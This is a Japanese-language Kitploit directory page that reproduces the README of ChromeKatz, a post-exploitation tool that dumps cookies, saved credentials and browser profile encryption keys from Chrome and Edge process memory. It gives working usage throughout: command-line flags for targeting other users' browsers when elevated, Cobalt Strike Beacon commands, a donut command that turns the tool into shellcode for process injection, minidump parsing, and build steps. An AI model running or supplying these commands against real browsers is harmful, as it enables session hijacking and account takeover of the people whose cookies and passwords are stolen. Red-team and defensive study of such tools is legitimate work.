Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ChromeKatz — Chrome/EdgeプロセスのメモリからCookieと認証情報を直接ダンプする | Kitploit
ツール/GitHubGitHub/meckazin/chromekatz
メモリフォレンジックパスワード攻撃データ流出デバッガポストエクスプロイトレッドチーミング
GitHubmeckazin/chromekatz

ChromeKatz

Chrome/EdgeプロセスのメモリからCookieと認証情報を直接ダンプする

リポジトリを見る
1.5k1384ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ChromeKatz

ChromeKatzは、Chromiumベースのブラウザのメモリから機密情報をダンプするためのソリューションです。 現時点では、ChromeKatzは次の3つのプロジェクトで構成されています:

  1. CookieKatz - Cookieダンパー
  2. CredentialKatz - 非推奨... とりあえず
  3. ElevationKatz - エレベーションサービスから復号鍵を取得

CookieKatzには、実行ファイル、Beacon Object File、ミニダンプパーサーがあります。また、ElevationKatzには実行ファイルとBeacon Object Fileがあります。

ElevationKatzは、ブラウザのメモリからCookieと認証情報のデータベースを解析し、それらを復号化できるようになりました。

CookieKatzは、Cookieを見つけるためのはるかに堅牢な方法を使用するように完全に刷新されました!新しい方法は古いブラウザバージョンもサポートしています。 関連するブラウザのApp-Bound暗号化を無効化するための新しいフラグ /inject がCookieKatzに実装されました!

私はコーヒーが必要です。そして私の猫たちも必要です!

ko-fi

CookieKatz - メモリから直接Cookieをダンプする

CookieKatzは、オペレーターがChrome、Edge、またはMsedgewebview2のプロセスメモリから直接Cookieをダンプできるようにするプロジェクトです。 Chromiumベースのブラウザは、起動時にディスク上のCookieデータベースからすべてのCookieを読み込みます。

このアプローチの利点は次のとおりです*:

  1. ChromeのIncogntioプロセスとEdgeのIn-PrivateプロセスからのCookieダンプをサポート
  2. 昇格した状態で実行すると、他のユーザーのブラウザのCookieにアクセス
  3. WebViewプロセスからCookieをダンプ
  4. ディスク上のデータベースファイルに触れる必要なし
  5. Cookieを復号化するためにDPAPIキーは不要
  6. ミニダンプファイルからCookieをオフラインで解析

これらの記述は、一部のブラウザ/アプリケーションでは依然として当てはまります。最新バージョンのChromeでは、プロセスにインジェクションする必要があります。 ... あるいは ElevationKatz を使用

32ビットのブラウザインストールはサポートされておらず、CookieKatzの32ビットビルドもサポートされていません。

現在、通常のCookieのみがダンプされます。ChromiumはPartitioned Cookiesを別の場所に保存するため、現在ダンプには含まれていません。

このソリューションは、PE実行ファイルであるCookieKatz、Beacon Object FileバージョンであるCookieKatz-BOF、そしてミニダンプパーサーであるCookieKatzMinidumpの3つのプロジェクトで構成されています。

使い方

注記! PIDを指定してターゲットを選択する場合は、/list または cookie-katz-find コマンドをそれぞれ使用して、適切なサブプロセスを選択してください!

CookieKatz

root@kitploit:~
Examples:
.\CookieKatz.exe
    By default targets first available Chrome process
.\CookieKatz.exe /edge
    Targets first available Edge process
.\CookieKatz.exe /pid:<pid>
    Attempts to target given pid, expecting it to be Chrome
.\CookieKatz.exe /webview /pid:<pid>
    Targets the given msedgewebview2 process
.\CookieKatz.exe /list /webview
    Lists available webview processes
.\CookieKatz.exe /inject
    Targets the current process. Use this flag when your are injecting CookieKatz to Chrome process.

TIP! If you need to inject CookieKatz into the Chrome process, you can turn the exe into shellcode using donut:
    .\donut.exe -a 2 --input <Path_to_CookieKatz.exe> -z 4 -b 1 -p "/inject" -t

Flags:
    /edge       Target current user Edge process
    /webview    Target current user Msedgewebview2 process
    /pid        Attempt to dump given pid, for example, someone else's if running elevated
    /list       List targettable processes, use with /edge or /webview to target other browsers
    /inject     Indicate that the process will run in the target process
    /out        Write output to file, default location is "C:\Users\Public\Documents\cookies.log"
    /help       This what you just did! -h works as well

CookieKatz-BOF

root@kitploit:~
beacon> help cookie-katz
Dump cookies from Chrome or Edge
Use: cookie-katz [chrome|edge|webview] [pid]

beacon> help cookie-katz-find
Find processes for Cookie-Katz
Use: cookie-katz-find [chrome|edge|webview]

CookieKatzMinidump

root@kitploit:~
Usage:
    CookieKatzMinidump.exe <Path_to_minidump_file>

Example:
    .\CookieKatzMinidump.exe .\msedge.DMP

To target correct process for creating the minidump, you can use the following PowerShell command:
    Get-WmiObject Win32_Process | where {$_.CommandLine -match 'network.mojom.NetworkService'} | select -Property Name,ProcessId

ElevationKatz - メモリからプロファイルデータベースのキーをダンプする

ElevationKatzを使用すると、オペレーターはブラウザのプロファイル暗号化キーをメモリからダンプして、ユーザーの機密情報にアクセスできるようになります。 これは、新しいブラウザプロセスを一時停止状態で起動し、ブレークポイントを設定して、ブラウザプロセスがエレベーターサービスからキーを受け取った時点でキーをダンプすることで機能します。

このアプローチの利点は次のとおりです:

  1. 管理者アクセスは不要
  2. 他のプロセスへのインジェクションは不要
  3. ディスクへのファイル書き込みなし
  4. ディスク上のプロファイルデータベースに触れる必要なし

ElevationKatzは、新しいブラウザプロセスを一時停止状態で起動し、デバッガーをアタッチします。次に、ブラウザのDLLをスキャンして、ブラウザがos_crypt::DecryptAppBoundStringへの呼び出しから戻る命令を見つけ、その直後にブレークポイントを設定します。ブレークポイントがヒットすると、ツールはメモリから暗号化キーをダンプします。

オペレーターが選択できるブレークポイントの種類は、ソフトウェアブレークポイントとハードウェアブレークポイントの2つです。

  • ソフトウェアブレークポイントは、メモリ内の命令をパッチして古い命令を上書きすることで機能します。これには当然、WIN APIのWriteProcessMemoryを使用するという欠点があります。
  • ハードウェアブレークポイントは、実行中のスレッドのレジスタに直接設定されます。これによりWriteProcessMemoryの使用は回避されますが、OpenThread->SuspendThread->ResumeThread というパターンを多用する必要があります。

さらに、HWブレークポイントでは、スレッド列挙の方法としてNtGetNextThreadとCreateToolhelp32Snapshotの2つがサポートされています。SWブレークポイントはスレッド列挙を必要としないため、/tl32フラグは影響しません。

新しいconfigパラメータを使用すると、プロファイルデータベースを自動的に復号化できます。これは、IHack4Falafelの技法を利用して、ブラウザのメモリからCookieおよびLogin Profileデータベースを解析し、ファイルに直接触れることを回避します。

注記 ダンプはHWブレークポイントでのみ機能します。理由は、SWブレークポイントを適切にクリーンアップしてRIPを巻き戻し、プロセスのクラッシュを防ぐ方法がわからなかったからです。

ElevationKatz

root@kitploit:~
Examples:
.\ElevationKatz.exe /chrome
    Starts a new chrome process using path: C:\Program Files\Google\Chrome\Application\chrome.exe
    Waits for 500 milliseconds for process to finish until forced shutdown.
.\ElevationKatz.exe /chrome /hw
    Starts a new chrome process using path: C:\Program Files\Google\Chrome\Application\chrome.exe
    Will use Hardware breakpoints instead of the software ones
    Waits for 500 milliseconds for process to finish until forced shutdown.
.\ElevationKatz.exe /chrome /config:all\n");
    Starts a new chrome process using path: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
    Will use Hardware breakpoints instead of the software ones
    Parses the cookie and credential database from the browser memory and dumps them
.\ElevationKatz.exe /edge /wait:1000
    Starts a new chrome process using path: C:\Program Files(x86)\Microsoft\Edge\Application\msedge.exe
    Waits for 1000 milliseconds for process to finish until forced shutdown.
.\ElevationKatz.exe /path:\"C:\Program Files\BraveSoftware\Brave - Browser\Application\brave.exe\" /module:chrome.dll
    Targets the Brave browser
    
Flags:
    /chrome                Target Chrome process.
    /edge                  Target Edge process.
    /hw                    Use Hardware breakpoints instead of SW ones.
    /tl32                  Use CreateToolhelp32Snapshot to enumerate process threads when using with /HW flag
    /wait:<milliseconds>   Maximum time to for the debugging. Use 0 for INFINITE. Defaults to 500ms.
    /path:<path_to_exe>    Provide path to the process executable
    /module:<some.dll>     Provide alternative module to target
    /config:<option>       Automatically locate and dump contents of profile databases. Options. Cookies|Creds|All
    /help                  This what you just did! -h works as well

ElevationKatz-BOF

root@kitploit:~
beacon> help elevation-katz
Dump elevation service encryption key

Use: elevation-katz [chrome|edge] [useHW] [useTL32] [wait:<ms>] [terminate] [executable:<path>] [module:<path>]

CredentialKatz - メモリから資格情報マネージャーの内容をダンプする

非推奨

私は、CredentialKatzが当初悪用していたバグについてChromiumプロジェクトに報告しましたが、彼らはそれを"Won't fix"としてマークし、資格情報がメモリに残っても構わないと述べました。

ところが、ツールが公開された後、彼らは私が提案したまさにその方法でバグを修正してしまいました :3 https://issues.chromium.org/issues/352085708

ビルドとインストール

プリコンパイル済みバイナリを使用する

ChrokeKatz BOFの最新リリースビルドはここからダウンロードしてください。zipファイルには、コンパイル済みのBOFと、それらを実行するためのCNAスクリプトが含まれています。

自分でビルドする

両方のプロジェクトは、Visual StudioでReleaseまたはDebug構成、x64プラットフォームを使ってビルドできます。

BOFバージョンは、Cobalt StrikeのVisual Studioテンプレートbof-vsを使用して開発されました。つまり、*-BOFsのDebug構成では、COFFファイルの代わりにexeが生成されます。Visual Studioテンプレートの使用方法については、ここで詳しく読むことができます。

x64 Native Tools Command Prompt for VS 2022でnmakeを使用して、独自のBOFをコンパイルできます:

root@kitploit:~
nmake all

クレジット

  • Henkru - BOFバージョンのクラッシュを修正し、CNAスクリプトを作成してくれた
  • IHack4Falafel - ブラウザのメモリからプロファイルDBを解析するクールなトリックを提供してくれた
  • B3arr0 - BOFバージョンをテストし、バグの修正を手伝ってくれた
  • TheWover - 素晴らしいPEB定義を提供してくれた!
  • 0vercl0k - ミニダンプ解析のコアライブラリであるudmp-parserを作成してくれた
ツールをダウンロード